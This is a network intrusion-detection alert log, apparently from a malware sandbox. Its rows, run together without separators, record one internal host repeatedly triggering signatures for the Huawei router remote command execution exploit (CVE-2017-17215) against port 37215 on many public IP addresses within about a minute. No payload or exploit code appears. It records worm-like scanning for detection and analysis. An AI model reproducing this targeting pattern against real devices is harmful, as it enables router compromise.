                                                        06/13/24-21:33:09.087170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080437215192.168.2.14197.35.69.57
                                                        06/13/24-21:32:19.754865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359037215192.168.2.1441.20.227.52
                                                        06/13/24-21:31:57.130261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.14156.127.171.55
                                                        06/13/24-21:32:28.043325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373637215192.168.2.1441.132.24.2
                                                        06/13/24-21:32:21.805701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471437215192.168.2.14197.13.30.85
                                                        06/13/24-21:33:09.127832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.14156.83.220.69
                                                        06/13/24-21:33:09.088493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405837215192.168.2.14156.64.178.84
                                                        06/13/24-21:32:38.318060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231437215192.168.2.14197.154.132.42
                                                        06/13/24-21:33:04.990249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890037215192.168.2.1441.141.152.2
                                                        06/13/24-21:32:15.633308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945237215192.168.2.1441.74.106.241
                                                        06/13/24-21:32:36.264314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770237215192.168.2.14156.215.58.227
                                                        06/13/24-21:33:07.042707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035037215192.168.2.14197.21.219.149
                                                        06/13/24-21:32:32.156201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579037215192.168.2.1441.172.3.185
                                                        06/13/24-21:32:30.098673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190637215192.168.2.14156.124.135.87
                                                        06/13/24-21:32:52.658425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465437215192.168.2.14156.235.255.149
                                                        06/13/24-21:32:58.824800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902837215192.168.2.14197.116.148.195
                                                        06/13/24-21:32:28.023821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626637215192.168.2.14156.109.239.91
                                                        06/13/24-21:32:21.787157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356037215192.168.2.14197.150.76.14
                                                        06/13/24-21:33:11.181744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707837215192.168.2.1441.71.146.18
                                                        06/13/24-21:32:46.502580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356437215192.168.2.14156.103.203.193
                                                        06/13/24-21:32:28.025751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876837215192.168.2.1441.199.105.221
                                                        06/13/24-21:32:25.993453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.1441.194.89.131
                                                        06/13/24-21:32:52.669462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124037215192.168.2.14197.197.16.33
                                                        06/13/24-21:33:13.210161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751437215192.168.2.1441.143.65.126
                                                        06/13/24-21:32:23.929267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742437215192.168.2.14156.187.134.13
                                                        06/13/24-21:33:07.040652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14156.92.74.130
                                                        06/13/24-21:32:40.374263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481237215192.168.2.14197.20.160.16
                                                        06/13/24-21:33:04.994019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428237215192.168.2.1441.53.164.185
                                                        06/13/24-21:32:05.369403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133037215192.168.2.1441.31.234.136
                                                        06/13/24-21:33:13.229637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318837215192.168.2.14197.240.186.186
                                                        06/13/24-21:31:57.134569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782437215192.168.2.14156.7.75.75
                                                        06/13/24-21:32:15.630027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911837215192.168.2.1441.95.170.78
                                                        06/13/24-21:32:25.969968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052437215192.168.2.14156.117.242.97
                                                        06/13/24-21:31:59.195531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121437215192.168.2.14156.87.33.240
                                                        06/13/24-21:32:07.419891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715237215192.168.2.14156.140.89.92
                                                        06/13/24-21:32:15.638155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008237215192.168.2.14156.243.231.198
                                                        06/13/24-21:33:07.054907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410437215192.168.2.1441.232.104.37
                                                        06/13/24-21:32:17.675164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918237215192.168.2.14197.119.3.239
                                                        06/13/24-21:32:54.726910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063437215192.168.2.14156.240.200.80
                                                        06/13/24-21:33:15.273261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964237215192.168.2.1441.197.113.119
                                                        06/13/24-21:32:15.638615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549437215192.168.2.14156.54.67.185
                                                        06/13/24-21:32:25.994769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274237215192.168.2.1441.158.19.110
                                                        06/13/24-21:32:56.757961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603637215192.168.2.1441.66.77.239
                                                        06/13/24-21:32:32.167467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316637215192.168.2.14197.135.160.132
                                                        06/13/24-21:32:46.524286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037637215192.168.2.1441.209.179.156
                                                        06/13/24-21:32:07.417413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463237215192.168.2.14197.16.214.48
                                                        06/13/24-21:32:25.977022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407637215192.168.2.1441.70.17.81
                                                        06/13/24-21:32:21.804158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.14156.132.227.196
                                                        06/13/24-21:32:50.633472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750237215192.168.2.14197.36.58.169
                                                        06/13/24-21:32:38.321699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836437215192.168.2.14197.78.241.169
                                                        06/13/24-21:33:00.871878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824437215192.168.2.14197.121.233.42
                                                        06/13/24-21:32:11.508871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785437215192.168.2.14156.118.201.224
                                                        06/13/24-21:33:05.013992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841637215192.168.2.1441.161.21.18
                                                        06/13/24-21:33:04.992023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400637215192.168.2.14197.73.130.209
                                                        06/13/24-21:32:46.524005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987237215192.168.2.14156.74.206.197
                                                        06/13/24-21:32:58.824706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689837215192.168.2.14156.147.2.34
                                                        06/13/24-21:32:15.636147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359037215192.168.2.14197.101.152.105
                                                        06/13/24-21:32:34.193999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020437215192.168.2.1441.118.160.45
                                                        06/13/24-21:32:48.569420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007637215192.168.2.14197.92.35.128
                                                        06/13/24-21:32:32.149481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937237215192.168.2.1441.142.130.221
                                                        06/13/24-21:32:09.459001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110037215192.168.2.1441.156.151.112
                                                        06/13/24-21:32:23.832417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010037215192.168.2.14156.51.245.142
                                                        06/13/24-21:33:13.228886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451637215192.168.2.14197.124.197.111
                                                        06/13/24-21:33:11.157762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832037215192.168.2.1441.123.42.47
                                                        06/13/24-21:32:17.672354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069637215192.168.2.14197.220.60.31
                                                        06/13/24-21:33:05.012643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.14197.118.153.219
                                                        06/13/24-21:33:15.273439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.14197.209.191.175
                                                        06/13/24-21:32:13.568419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372237215192.168.2.1441.118.160.150
                                                        06/13/24-21:32:03.273417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493637215192.168.2.14197.48.254.185
                                                        06/13/24-21:32:30.074400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876637215192.168.2.14197.53.237.47
                                                        06/13/24-21:32:36.264947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810637215192.168.2.1441.144.95.229
                                                        06/13/24-21:32:32.166197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447637215192.168.2.14156.179.211.23
                                                        06/13/24-21:32:36.269090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657237215192.168.2.1441.85.172.57
                                                        06/13/24-21:32:52.659752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048237215192.168.2.14197.114.11.142
                                                        06/13/24-21:32:52.660797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292837215192.168.2.14156.182.106.165
                                                        06/13/24-21:33:00.887955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374437215192.168.2.14197.14.106.82
                                                        06/13/24-21:32:15.611114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520237215192.168.2.14197.9.182.101
                                                        06/13/24-21:32:36.267397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.14156.147.158.180
                                                        06/13/24-21:33:02.912888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097437215192.168.2.14197.8.238.80
                                                        06/13/24-21:32:34.213226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610437215192.168.2.1441.158.79.182
                                                        06/13/24-21:33:00.887648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149637215192.168.2.14156.145.211.174
                                                        06/13/24-21:33:02.910148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180437215192.168.2.14197.94.203.132
                                                        06/13/24-21:32:07.416757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906437215192.168.2.14197.215.14.191
                                                        06/13/24-21:32:30.098064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276637215192.168.2.14156.71.217.161
                                                        06/13/24-21:33:17.310142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639637215192.168.2.14197.49.212.19
                                                        06/13/24-21:32:58.839628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851437215192.168.2.14156.53.117.148
                                                        06/13/24-21:32:46.510209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305637215192.168.2.14156.119.89.157
                                                        06/13/24-21:32:07.401051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036237215192.168.2.1441.65.112.125
                                                        06/13/24-21:33:00.885479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644437215192.168.2.14197.170.181.238
                                                        06/13/24-21:32:17.695630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206637215192.168.2.14156.83.181.38
                                                        06/13/24-21:32:19.726990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235237215192.168.2.14156.66.202.90
                                                        06/13/24-21:32:09.453336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509437215192.168.2.14156.18.193.115
                                                        06/13/24-21:33:15.271774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763437215192.168.2.14197.22.12.15
                                                        06/13/24-21:32:21.804205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385037215192.168.2.1441.184.97.159
                                                        06/13/24-21:32:52.676646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983837215192.168.2.1441.60.112.66
                                                        06/13/24-21:32:13.547362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501237215192.168.2.14197.118.12.19
                                                        06/13/24-21:32:38.303310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338637215192.168.2.14197.32.154.214
                                                        06/13/24-21:32:54.711718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839637215192.168.2.1441.72.82.215
                                                        06/13/24-21:33:07.042252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667437215192.168.2.14197.94.77.252
                                                        06/13/24-21:32:01.222148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331837215192.168.2.1441.161.127.92
                                                        06/13/24-21:32:50.612949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405837215192.168.2.1441.249.221.160
                                                        06/13/24-21:33:02.936607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965237215192.168.2.14156.238.18.75
                                                        06/13/24-21:32:44.457908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227837215192.168.2.1441.236.187.131
                                                        06/13/24-21:31:59.177752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662837215192.168.2.14156.164.61.20
                                                        06/13/24-21:32:46.526167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958037215192.168.2.1441.220.168.239
                                                        06/13/24-21:32:54.726240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480037215192.168.2.14197.4.45.33
                                                        06/13/24-21:33:02.954957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359237215192.168.2.14197.252.90.85
                                                        06/13/24-21:33:00.869493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721637215192.168.2.14156.1.166.221
                                                        06/13/24-21:33:09.087840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722237215192.168.2.1441.136.104.206
                                                        06/13/24-21:32:23.835089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144637215192.168.2.14197.247.20.220
                                                        06/13/24-21:32:42.422352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921837215192.168.2.1441.3.107.124
                                                        06/13/24-21:32:17.697390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659237215192.168.2.1441.123.180.60
                                                        06/13/24-21:33:13.213474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019637215192.168.2.14156.37.244.70
                                                        06/13/24-21:31:59.194674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.1441.55.60.186
                                                        06/13/24-21:33:05.013138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982837215192.168.2.14197.126.239.182
                                                        06/13/24-21:32:48.568842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.14197.216.157.198
                                                        06/13/24-21:32:48.573021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680237215192.168.2.14156.22.225.125
                                                        06/13/24-21:33:04.993327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462037215192.168.2.1441.227.196.24
                                                        06/13/24-21:32:44.480373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969637215192.168.2.14197.186.224.173
                                                        06/13/24-21:32:07.403652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872437215192.168.2.14156.46.76.62
                                                        06/13/24-21:32:36.247385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127237215192.168.2.1441.232.35.140
                                                        06/13/24-21:32:52.678168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775437215192.168.2.14197.142.183.119
                                                        06/13/24-21:32:03.274294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445037215192.168.2.14156.29.70.149
                                                        06/13/24-21:33:09.090325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366237215192.168.2.14156.1.186.248
                                                        06/13/24-21:32:38.321066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639037215192.168.2.1441.193.127.44
                                                        06/13/24-21:32:32.152185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479437215192.168.2.14197.186.91.30
                                                        06/13/24-21:32:34.214513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382437215192.168.2.14197.161.14.93
                                                        06/13/24-21:32:34.193083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594837215192.168.2.1441.252.134.89
                                                        06/13/24-21:32:58.824984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224237215192.168.2.14197.57.12.52
                                                        06/13/24-21:33:11.157271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777837215192.168.2.14197.85.76.102
                                                        06/13/24-21:32:09.438263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009837215192.168.2.14197.1.96.213
                                                        06/13/24-21:32:23.942082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383837215192.168.2.14156.234.139.157
                                                        06/13/24-21:32:40.357793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447437215192.168.2.14197.22.44.212
                                                        06/13/24-21:33:13.228585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013837215192.168.2.14156.167.12.125
                                                        06/13/24-21:32:03.300223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349437215192.168.2.14197.121.4.160
                                                        06/13/24-21:32:21.786467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897837215192.168.2.14197.39.148.29
                                                        06/13/24-21:31:57.091847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.14156.18.202.162
                                                        06/13/24-21:32:56.788582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908437215192.168.2.14156.54.242.164
                                                        06/13/24-21:32:52.669371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769437215192.168.2.1441.140.105.61
                                                        06/13/24-21:32:19.731776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920237215192.168.2.1441.44.70.8
                                                        06/13/24-21:32:46.524433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716037215192.168.2.14156.122.246.139
                                                        06/13/24-21:33:00.868500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034837215192.168.2.14156.192.100.241
                                                        06/13/24-21:33:00.884499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355837215192.168.2.14156.103.84.207
                                                        06/13/24-21:32:17.671762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096237215192.168.2.14156.126.137.78
                                                        06/13/24-21:32:19.729661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548437215192.168.2.14197.28.15.44
                                                        06/13/24-21:32:52.660457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772437215192.168.2.14156.252.90.147
                                                        06/13/24-21:32:58.839664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684237215192.168.2.1441.147.147.78
                                                        06/13/24-21:32:46.524846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878037215192.168.2.14156.123.129.19
                                                        06/13/24-21:32:09.455834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833237215192.168.2.14156.235.241.35
                                                        06/13/24-21:33:11.155567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518837215192.168.2.14156.73.29.18
                                                        06/13/24-21:32:56.756285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886237215192.168.2.14197.127.9.232
                                                        06/13/24-21:33:02.912528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920237215192.168.2.14156.239.255.151
                                                        06/13/24-21:32:50.629490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897637215192.168.2.1441.10.35.85
                                                        06/13/24-21:32:25.975308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558037215192.168.2.14156.224.136.197
                                                        06/13/24-21:32:58.821177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805637215192.168.2.14156.168.171.69
                                                        06/13/24-21:32:58.839436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398237215192.168.2.14156.246.145.124
                                                        06/13/24-21:32:05.345559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829237215192.168.2.14197.95.202.248
                                                        06/13/24-21:33:02.955000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.1441.64.80.55
                                                        06/13/24-21:31:57.155163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586037215192.168.2.14156.52.146.119
                                                        06/13/24-21:32:13.543856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778037215192.168.2.14156.35.83.31
                                                        06/13/24-21:32:05.349538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14156.192.101.18
                                                        06/13/24-21:32:11.508412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764037215192.168.2.14197.88.236.132
                                                        06/13/24-21:33:09.090542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336037215192.168.2.1441.206.74.223
                                                        06/13/24-21:32:23.941159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580437215192.168.2.14197.15.123.57
                                                        06/13/24-21:32:40.356840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862437215192.168.2.1441.28.175.6
                                                        06/13/24-21:32:01.241440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186837215192.168.2.14156.221.118.239
                                                        06/13/24-21:32:54.725420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669437215192.168.2.1441.69.116.207
                                                        06/13/24-21:32:23.836894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106637215192.168.2.14156.11.222.219
                                                        06/13/24-21:33:13.231828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683837215192.168.2.14197.172.29.136
                                                        06/13/24-21:33:11.179024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626237215192.168.2.14156.248.247.56
                                                        06/13/24-21:32:36.248085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492237215192.168.2.14197.188.184.129
                                                        06/13/24-21:32:21.783811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406037215192.168.2.1441.251.220.98
                                                        06/13/24-21:32:50.613431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294237215192.168.2.14156.216.215.85
                                                        06/13/24-21:32:05.350465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237837215192.168.2.14156.221.117.2
                                                        06/13/24-21:32:54.710502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.14156.173.137.60
                                                        06/13/24-21:32:58.839383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761237215192.168.2.14197.177.4.236
                                                        06/13/24-21:32:13.565517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739637215192.168.2.1441.160.85.66
                                                        06/13/24-21:33:09.102059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828637215192.168.2.1441.175.242.235
                                                        06/13/24-21:32:34.191715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.14156.186.202.171
                                                        06/13/24-21:33:17.306398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.1441.116.211.51
                                                        06/13/24-21:33:13.231944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192037215192.168.2.14197.12.44.7
                                                        06/13/24-21:33:07.058490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724437215192.168.2.14197.238.141.28
                                                        06/13/24-21:32:44.452980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920837215192.168.2.14197.236.212.199
                                                        06/13/24-21:33:11.177263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828037215192.168.2.1441.165.116.188
                                                        06/13/24-21:32:58.819878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360837215192.168.2.14156.163.180.164
                                                        06/13/24-21:33:13.229800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028837215192.168.2.1441.10.59.61
